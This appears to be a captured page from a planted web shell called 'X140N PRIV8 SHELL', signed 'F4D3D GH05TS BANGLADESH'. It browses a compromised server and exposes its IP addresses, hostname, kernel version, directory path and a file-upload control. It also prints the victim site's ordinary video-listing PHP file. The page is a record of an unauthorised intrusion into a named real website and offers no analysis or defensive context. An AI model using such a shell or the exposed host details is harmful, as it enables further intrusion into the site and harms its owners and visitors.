./X140N PRIV8 SHELL
:
216.73.216.124
:
188.40.95.74 / mail.vlasotince.tv
:
Linux cp01.striminghost.net 3.10.0-1160.119.1.el7.tuxcare.els13.x86_64 #1 SMP Fri Nov 22 06:29:45 UTC 2024 x86_64
:
/
home
/
vlasotin
/
www
/
pages
/
Upload File:
files >> /home/vlasotin/www/pages/video.php
<div class="theiaStickySidebar"> <div class="panel_inner"> <div class="panel_header"> <h4><strong>Video</strong> - TV prilozi </h4> </div> <div class="post_details_block"> <div class="news-grid-2"> <div class="row"> <?php $page = ($page == "") ? 1 : $page; $limit = 30; $offset = ($page - 1) * $limit; $SQL = "SELECT * FROM video_klipovi ORDER BY id DESC"; $upit = mysql_query($SQL, $link); $resultCount = mysql_num_rows($upit); $upit = mysql_query($SQL." LIMIT ".$offset.", ".$limit, $link); while($data = mysql_fetch_array($upit, MYSQL_ASSOC)) { ?> <div class="col-xs-6 col-sm-4 col-md-4" style="min-height: 170px;"> <div class="grid-item"> <div class="grid-item-img"> <a href="<?php echo $data['klip']; ?>" target="_blank"> <img src="/timthumb.php?src=<?php echo $thumb = preuzmi_youtube_thumb($data['klip']);?>&w=210&h=145" class="img-responsive" alt=""> <div class="link-icon"><i class="fa fa-play"></i></div> </a> </div> <h5><a href="<?php echo $data['klip']; ?>" class="title"><?php echo skrati($data['naziv'], 38); ?></a></h5> </div> </div> <?php } ?> </div> </div> </div> <!-- Post footer --> <div class="post-footer"> <div class="row thm-margin"> <div class="col-xs-12 col-sm-12 col-md-12 thm-padding"> <?php $URLlink = "/video/".$filterURL; createPagination($URLlink, $page, $resultCount, $limit); ?> </div> </div> </div> <!-- /.Post footer--> </div> </div>
Copyright © 2022 F4D3D GH05TS BANGLADESH | All Rights Reserved